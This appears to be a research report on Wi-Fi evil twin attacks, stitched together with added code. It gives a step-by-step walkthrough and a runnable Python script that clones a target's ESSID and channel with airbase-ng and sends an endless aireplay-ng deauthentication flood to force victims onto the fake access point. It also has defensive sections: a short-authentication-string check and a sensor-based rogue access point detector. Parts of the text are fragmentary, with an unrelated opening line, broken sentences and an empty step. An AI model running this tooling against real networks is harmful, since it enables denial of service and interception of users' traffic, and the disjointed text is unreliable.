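A rogue that copies SSID, BSSID, channel and security exactly produces no finding here; that case needs RSSI or timing anomalies, which this check does not cover.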
Therefore, when a victim connects to a fake access point, the attacker can easily access the victim's information. An attacker could use a smartphone or any Internet-enabled device to create a malicious twin access point. The attacker first connects to a legitimate access point, then starts the clone access point, which sends out the same radio signal as the legitimate access point. After that, the victim will notice two access points with the same network name. The evil twin attack is not a new phenomenon in wireless transmission; it is also called a base station clone or honeypot. Now, enterprises have begun to use VPNs to protect corporate data and employees using wireless devices from malicious attacks.
network. Under this type of attack, an attacker can easily steal the victim's information without
having to create additional network connections for the Internet.
Assume that an attacker operates a rogue access point that competes with a legitimate one in a
location such as a cafe. Even without any of the legitimate access point's secret key material,
the rogue access point can fully emulate it at the link layer. The attacker cannot, however,
destroy or replace the legitimate access point, nor tamper with the physical channel or with the
legitimate access point itself (for example its indicator lights) from the outside. The attacker
can hide the rogue access point; a rogue access point installed in a conspicuous place might be
mistaken by customers for a real one, but the cafe staff would discover and remove it.
In our scenario we cannot assume that the user's device and the access point share a key, or
that either holds a public-key certificate signed by a trusted third party. Instead, the devices
exchange public keys over the insecure wireless channel and use them to protect their
communication. The user defeats a man-in-the-middle by comparing the exchanged keys over a
low-bandwidth visible channel that the attacker cannot forge. This can be done efficiently with a
"short authentication string" (SAS) protocol; such protocols have been described in the
literature and proven secure.
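The SAS check from the paragraph above, worked as an added example that is not code from the report. The "public keys" are fixed byte strings standing in for real Diffie-Hellman values, and the commit-then-reveal message order and the six-digit SAS encoding are this example's own choices; what it shows is why an evil twin that relays the exchange cannot make both users see the same string.

```python
"""Short authentication string (SAS) check for an unauthenticated
public-key exchange over Wi-Fi.

Added example, not code from the original report.  The "public keys"
below are opaque byte strings standing in for real Diffie-Hellman values;
the commit-then-reveal order and the 6-digit SAS encoding are assumptions
of this example, not of any particular standard.
"""
import hashlib
import hmac

SAS_DIGITS = 6  # about 20 bits: a relaying attacker gets a matching SAS once in 10**6 tries


def commitment(pub_key: bytes, nonce: bytes) -> bytes:
    """Hash commitment sent *before* the peer reveals its key, so the party
    that speaks last cannot grind its key until the two SAS values collide."""
    return hashlib.sha256(b"sas-commit|" + pub_key + b"|" + nonce).digest()


def verify_reveal(commit: bytes, pub_key: bytes, nonce: bytes) -> bool:
    """Check that the revealed (key, nonce) pair matches the earlier commitment."""
    return hmac.compare_digest(commit, commitment(pub_key, nonce))


def short_auth_string(pub_a: bytes, pub_b: bytes, nonce_a: bytes, nonce_b: bytes) -> str:
    """Derive the SAS from everything exchanged over the untrusted radio link.
    Both users compare this string over the visible (authenticated) channel."""
    digest = hashlib.sha256(
        b"sas|" + pub_a + b"|" + pub_b + b"|" + nonce_a + b"|" + nonce_b).digest()
    value = int.from_bytes(digest[:4], "big") % 10 ** SAS_DIGITS
    return f"{value:0{SAS_DIGITS}d}"


def honest_exchange(pub_a, nonce_a, pub_b, nonce_b):
    """Direct A<->B run: A commits, B reveals, A reveals, B checks, both derive the SAS."""
    c_a = commitment(pub_a, nonce_a)          # A -> B
    # B -> A: pub_b, nonce_b  (B speaks second, but A is already bound by c_a)
    # A -> B: pub_a, nonce_a
    if not verify_reveal(c_a, pub_a, nonce_a):
        raise ValueError("A's reveal does not match its commitment")
    sas_on_a = short_auth_string(pub_a, pub_b, nonce_a, nonce_b)
    sas_on_b = short_auth_string(pub_a, pub_b, nonce_a, nonce_b)
    return sas_on_a, sas_on_b


def mitm_exchange(pub_a, nonce_a, pub_b, nonce_b, pub_m, nonce_m):
    """Evil-twin operator M relays the exchange: A talks to M (posing as B) and
    M talks to B (posing as A).  Each leg is internally consistent, so no
    commitment check fails; only the SAS comparison exposes the substitution."""
    c_a = commitment(pub_a, nonce_a)          # A -> M
    c_m = commitment(pub_m, nonce_m)          # M -> B, M's own commitment
    if not (verify_reveal(c_a, pub_a, nonce_a) and verify_reveal(c_m, pub_m, nonce_m)):
        raise ValueError("reveal does not match commitment")
    sas_on_a = short_auth_string(pub_a, pub_m, nonce_a, nonce_m)   # what A's screen shows
    sas_on_b = short_auth_string(pub_m, pub_b, nonce_m, nonce_b)   # what B's screen shows
    return sas_on_a, sas_on_b


# Constructed, deterministic stand-ins for DH public keys and nonces (not real keys).
PUB_A = hashlib.sha256(b"client public key").digest()
PUB_B = hashlib.sha256(b"access point public key").digest()
PUB_M = hashlib.sha256(b"evil twin public key").digest()
NONCE_A, NONCE_B, NONCE_M = b"\x01" * 16, b"\x02" * 16, b"\x03" * 16

if __name__ == "__main__":
    a, b = honest_exchange(PUB_A, NONCE_A, PUB_B, NONCE_B)
    print("honest   :", a, b, "match" if a == b else "MISMATCH")
    a, b = mitm_exchange(PUB_A, NONCE_A, PUB_B, NONCE_B, PUB_M, NONCE_M)
    print("evil twin:", a, b, "match" if a == b else "MISMATCH -> abort")
```

The commitment is what makes the short string safe: without it, the side that reveals last could keep regenerating its key until the two six-digit strings agree, and the attacker in the middle is always in a position to speak last on one leg.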
Hardware and Software Requirements:
The table below lists the minimum hardware and software the researcher needs to perform this
attack simulation.

Hardware & software   Description
                      Function   - To provide network connection.
Kali Linux 2.0        Limitation - The researcher will have to learn Kali Linux commands.
                      Comparison - The researcher could use:
                                   - Wireshark
                                   - CORE Impact
Virtual Machine 10    Function   - It allows the user to install and run other operating
                                   systems on a single physical machine.
                      Purpose    - It will allow the researcher to run Kali Linux 2.0.
                      Limitation - It uses some of the laptop's resources, such as memory
                                   and processing time, so it is slower than an OS
                                   installed directly on the laptop.
                      Comparison - The researcher could use:
                                   - RVTools
                                   - VMVision Manager
connect to the fake access
point.
Step: 1
The attack requires a VMware virtual machine, Kali Linux 2.0 and a PROLINK wireless adapter.
First install VMware on an Internet-connected host, then install Kali Linux 2.0 in a VMware
virtual machine. Once both are installed, plug the wireless adapter into the host and pass it
through to the virtual machine. The adapter must support monitor mode and frame injection,
otherwise the scanning and deauthentication steps below will fail.
Step: 2
Create an access point that the attacker controls. In this study the attacker-controlled access
point was created on the Kali virtual machine, and a smartphone was used as the victim that
connects to it. The fake access point advertises the same SSID as the original network, so
anyone looking at the Wi-Fi list on a phone or laptop sees the same name as the original
network. Users may connect to it by mistake, believing it to be their own network; once a
connection is established, the attacker can eavesdrop on all of the victim's traffic and harvest
valuable information.
• First, open a terminal and run 'iwconfig' to check the wireless interface's current mode
(Managed or Monitor).
Step: 3
The adapter has to be put into monitor mode, because the network must be scanned passively to
obtain the target's ESSID and channel. First run 'airmon-ng check'. As the screenshot shows,
three processes were found that could interfere with the scan (network managers such as
NetworkManager or wpa_supplicant reset the interface while it is in monitor mode). Kill them
with 'airmon-ng check kill' so that they do not interfere with the scan.
Step: 4
Now start a monitor-mode interface with 'airmon-ng start wlan0'. On Kali Linux 2.0 this creates
a new interface named wlan0mon (older versions named it mon0). The later commands in this
walkthrough refer to that interface variously as wlan0 and mon0; the name to use is whatever
airmon-ng reports.
Step: 5
Step: 6
Now scan for networks with 'airodump-ng wlan0mon'. As the screenshot shows, the target network
in this study uses WEP encryption. The encryption type matters little for the scan itself, and
the deauthentication flood used later works against WEP, WPA and WPA2 networks alike unless the
access point and its clients use protected management frames (802.11w). What the attacker needs
from the scan is the ESSID, which is simply the network's name, and the channel the network
operates on; the fake access point is then created with the same values. Note, however, that the
fake access point created in Step 7 is open, so a device with a saved WPA/WPA2 profile for the
real network will not join the open twin automatically; the victim has to select it by hand,
which is why the attack works best against open hotspots.
Step: 7
Kali Linux provides the 'airbase-ng' tool (part of the aircrack-ng suite) to create fake access
points. The fake access point needs a BSSID and a network name; the name is copied from the
original access point so that users cannot tell the two apart in their network list. Here the
researchers chose the BSSID AA:AA:AA:AA:AA:AA and copied the ESSID "ALFA" and channel 6 from the
original. The command is: 'airbase-ng -a AA:AA:AA:AA:AA:AA --essid "ALFA" -c 6 wlan0mon'.
airbase-ng also creates a tap interface, at0, on the attacking machine; to give victims working
Internet access, so that they notice nothing, the attacker would bring up at0 with a DHCP server
and route it to a real uplink. The walkthrough below stops at the association itself. The
following image shows the virtual access point being created successfully.
Step: 8
To confirm that the fake access point is running, open a new terminal and run
'airodump-ng --channel 6 wlan0mon'.
Once Enter is pressed, the wireless card scans channel 6 and the figure below shows two "ALFA"
access points: one is the fake and the other the original. Users have no way of knowing which is
which.
Step: 9
Now disconnect the victim from the original access point and force it towards the fake one. The
only way to do this is a denial-of-service attack: a deauthentication flood that continually
attacks the client and prevents it from staying authenticated to the original access point.
After a while the client should reconnect, and if the fake access point (which uses open
authentication) is the one it picks, the study can capture its details and eavesdrop on what it
does on the Internet.
For this the attack abuses the 802.11 deauthentication frame. Normally a client or an access
point sends this frame to end a session; because the frame is not authenticated in networks
without 802.11w, an attacker can forge it with the access point's address as the source. To stop
the victim from reconnecting to the original access point, the researcher sends a continuous
flood of such frames; the client keeps being thrown off and eventually tries the next closest
access point with the same name, which is hopefully the fake one.
To do this, open a new terminal and run 'aireplay-ng --deauth 0 -a 00:C0:CA:74:CC:7A wlan0mon',
where 0 means send deauthentication frames indefinitely and -a gives the BSSID of the original
access point (adding '-c <client MAC>' would limit the flood to a single victim). The following
image shows the deauthentication frames being sent to the smartphone, which can no longer
reconnect to the original access point.
The diagram below shows the attack continuing to send these frames to the victim's smartphone.
Step: 10
The attack was successful: the victim's smartphone could no longer stay connected to the
original access point, so after a while it tried the next closest access point with the same
name and joined the fake one instead. From that point the attacker can collect valuable
information from the user's smartphone.
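The scan, clone and deauthentication steps above as one script. This is an added example and not the report's own code: it reads the CSV that airodump-ng writes with '-w <prefix>' (the sample capture is constructed; only the BSSID 00:C0:CA:74:CC:7A and the ESSID "ALFA" come from the walkthrough, the second access point and the client MAC are made up), selects the target by ESSID and builds the airbase-ng and aireplay-ng command lines for the monitor interface, assumed here to be wlan0mon. It is a dry run by default; the commands only start when launch() is told to execute, as root, on a machine with a monitor-mode adapter.

```python
"""Steps 6 to 9 of the walkthrough as one script: read an airodump-ng
capture, pick the target by ESSID, then build the airbase-ng clone and
the aireplay-ng deauthentication flood.

Added example, not code from the original report.  Assumptions: the CSV
layout is the one airodump-ng writes with -w <prefix>; the capture below is
constructed (only 00:C0:CA:74:CC:7A and "ALFA" come from the report; the
second AP and the client MAC are made up); wlan0mon is the interface name
Kali 2.0's airmon-ng assigns.  Nothing runs unless launch(..., execute=True)
is called as root with a monitor-mode adapter.
"""
import csv
import io
import subprocess

# Constructed sample in airodump-ng's CSV layout: the access-point table,
# a blank line, then the station (client) table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:C0:CA:74:CC:7A, 2018-10-10 14:02:11, 2018-10-10 14:05:40,  6,  54, WEP, WEP, OPN, -41,  312,  0,   0.  0.  0.  0,   4, ALFA,
11:22:33:44:55:66, 2018-10-10 14:02:12, 2018-10-10 14:05:40, 11,  54, WPA2, CCMP, PSK, -67,  140,  0,   0.  0.  0.  0,  10, CAFE-GUEST,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2018-10-10 14:02:30, 2018-10-10 14:05:39, -52,  88, 00:C0:CA:74:CC:7A, ALFA
"""


def parse_airodump_csv(text):
    """Return (access_points, stations) as lists of dicts keyed by column name."""
    aps, stations, header, section = [], [], None, "ap"
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        row = [field.strip() for field in row]
        if not any(row):                     # blank line separates the two tables
            header = None
            continue
        if header is None:                   # first row of each table is its header
            header = row
            section = "station" if header[0] == "Station MAC" else "ap"
            continue
        record = dict(zip(header, row))
        (stations if section == "station" else aps).append(record)
    return aps, stations


def find_target(aps, essid):
    """The attacker needs the ESSID and channel for the clone and the real BSSID for the flood."""
    for ap in aps:
        if ap["ESSID"] == essid:
            return {"essid": essid, "bssid": ap["BSSID"],
                    "channel": int(ap["channel"]), "privacy": ap["Privacy"]}
    raise LookupError(f"no access point advertising {essid!r} in the capture")


def clients_of(stations, bssid):
    """Clients currently associated with the given BSSID (deauth candidates)."""
    return [s["Station MAC"] for s in stations if s["BSSID"] == bssid]


def build_commands(target, fake_bssid, iface="wlan0mon", client=None):
    """airbase-ng hosts an open twin with the same ESSID on the same channel;
    aireplay-ng floods the real BSSID with deauthentication frames
    (count 0 = keep sending).  -c restricts the flood to one client."""
    clone = ["airbase-ng", "-a", fake_bssid, "--essid", target["essid"],
             "-c", str(target["channel"]), iface]
    deauth = ["aireplay-ng", "--deauth", "0", "-a", target["bssid"]]
    if client:
        deauth += ["-c", client]
    deauth.append(iface)
    return {"clone": clone, "deauth": deauth}


def launch(commands, execute=False):
    """Print the command lines; start them only when explicitly asked to."""
    procs = []
    for name, argv in commands.items():
        print(f"[{name}] {' '.join(argv)}")
        if execute:
            procs.append(subprocess.Popen(argv))
    return procs


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    target = find_target(aps, "ALFA")
    victims = clients_of(stations, target["bssid"])
    launch(build_commands(target, "AA:AA:AA:AA:AA:AA", client=victims[0] if victims else None))
```

With a single adapter, airbase-ng and aireplay-ng compete for the radio, as they do in the walkthrough; with two adapters one can host the twin on channel 6 while the other floods the original access point.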
5.0 Solution and Recommendations:
The problem can be reduced by deploying sensors throughout the network and using their
physical-layer measurements (signal strength at known sensor positions) together with link-layer
information (the BSSID, ESSID, channel and security settings of every beaconing access point) to
detect and locate evil twin APs in a distributed architecture. Such a scheme can be used in many
enterprise WLANs. A hybrid approach, which combines these sensor observations with other
indicators of the attack such as a burst of deauthentication frames carrying the legitimate
access point's address, detects an evil twin more reliably than either signal alone. On the
client side the countermeasures discussed in the introduction still apply: prefer WPA2 networks
over open hotspots, since a rogue access point without the key cannot complete the handshake,
and use a VPN so that traffic passing through an untrusted access point remains protected.
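A sketch of the sensor-based, hybrid detection described above, written as an added example rather than code from the report or from any product. The authorised-AP inventory, the sensor names, their beacon observations and the deauthentication-frame counts are all constructed for the example; a real deployment would feed them from monitor-mode sensors placed around the site. The rules are: a BSSID not in the inventory advertising an authorised ESSID is suspect, a mismatched security setting raises the suspicion, a concurrent flood of deauthentication frames spoofing the legitimate BSSID confirms it, and the sensor reporting the strongest signal gives the rogue access point's approximate location.

```python
"""Evil-twin detection from distributed sensor reports (link-layer data
plus signal strength, plus a deauthentication-flood indicator).

Added example, not code from the original report.  The inventory, the
sensor names, the observations and the thresholds are constructed; only
the BSSIDs 00:C0:CA:74:CC:7A / AA:AA:AA:AA:AA:AA and the ESSID "ALFA"
come from the walkthrough.
"""
from collections import defaultdict

# Authorised APs as the network owner knows them: BSSID set and expected privacy.
INVENTORY = {
    "ALFA": {"bssids": {"00:C0:CA:74:CC:7A"}, "privacy": "WEP"},
}

# Constructed beacon observations from three sensors during one scan window.
OBSERVATIONS = [
    {"sensor": "s1-entrance", "bssid": "00:C0:CA:74:CC:7A", "essid": "ALFA", "channel": 6, "privacy": "WEP", "rssi": -48},
    {"sensor": "s2-counter", "bssid": "00:C0:CA:74:CC:7A", "essid": "ALFA", "channel": 6, "privacy": "WEP", "rssi": -40},
    {"sensor": "s1-entrance", "bssid": "AA:AA:AA:AA:AA:AA", "essid": "ALFA", "channel": 6, "privacy": "OPN", "rssi": -35},
    {"sensor": "s2-counter", "bssid": "AA:AA:AA:AA:AA:AA", "essid": "ALFA", "channel": 6, "privacy": "OPN", "rssi": -61},
    {"sensor": "s3-terrace", "bssid": "AA:AA:AA:AA:AA:AA", "essid": "ALFA", "channel": 6, "privacy": "OPN", "rssi": -77},
    {"sensor": "s3-terrace", "bssid": "11:22:33:44:55:66", "essid": "CAFE-GUEST", "channel": 11, "privacy": "WPA2", "rssi": -70},
]

# Constructed deauthentication-frame counts per sensor, keyed by the source
# address the frames claim (a forged flood carries the legitimate BSSID).
DEAUTH_FRAMES = [
    ("s1-entrance", "00:C0:CA:74:CC:7A", 417),
    ("s2-counter", "00:C0:CA:74:CC:7A", 390),
    ("s3-terrace", "00:C0:CA:74:CC:7A", 12),
]

FLOOD_THRESHOLD = 50  # assumed: deauth frames per window per sensor before it counts as a flood


def detect_evil_twins(observations, deauth_frames, inventory, flood_threshold=FLOOD_THRESHOLD):
    """Return one alert per suspect BSSID, with the reasons and the nearest sensor."""
    by_bssid = defaultdict(list)
    for obs in observations:
        by_bssid[obs["bssid"]].append(obs)

    alerts = []
    for bssid, obs_list in by_bssid.items():
        essid = obs_list[0]["essid"]
        known = inventory.get(essid)
        if known is None or bssid in known["bssids"]:
            continue  # not one of our ESSIDs, or an authorised radio for it
        # 1. link-layer check: an authorised ESSID from a BSSID we do not own
        reasons = ["unknown BSSID advertising an authorised ESSID"]
        # 2. the twin in the walkthrough is open while the real AP is not
        privacy = obs_list[0]["privacy"]
        if privacy != known["privacy"]:
            reasons.append(f"privacy {privacy} differs from expected {known['privacy']}")
        # 3. hybrid signal: a flood spoofing the legitimate BSSID at the same time
        flooded = sorted(s for s, src, n in deauth_frames
                         if src in known["bssids"] and n >= flood_threshold)
        if flooded:
            reasons.append(f"deauth flood spoofing {essid}'s BSSID seen by {flooded}")
        # 4. locate: the sensor hearing it loudest is the closest one
        nearest = max(obs_list, key=lambda o: o["rssi"])
        alerts.append({
            "essid": essid, "bssid": bssid, "channel": obs_list[0]["channel"],
            "nearest_sensor": nearest["sensor"], "rssi": nearest["rssi"],
            "confidence": "high" if len(reasons) >= 3 else "medium",
            "reasons": reasons,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_evil_twins(OBSERVATIONS, DEAUTH_FRAMES, INVENTORY):
        print(f"{alert['confidence'].upper()}: {alert['essid']} from {alert['bssid']} "
              f"near {alert['nearest_sensor']} ({alert['rssi']} dBm)")
        for reason in alert["reasons"]:
            print("  -", reason)
```

The strongest-RSSI rule is the crudest form of localisation; with calibrated sensor positions the same per-sensor readings can be trilaterated, which is what the distributed architectures cited above do.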
6.0 Conclusion:
The research simulation was successful: the researchers were able to execute the attack and
demonstrate the vulnerability, and they have provided solutions and recommendations to prevent
the resulting information theft. Evil twin attacks pose a serious security risk to hotspot users.
It is therefore highly desirable to equip users with additional tools and methods for verifying
the access points they connect to, so that they can confirm these are genuine and not traps set
by an attacker.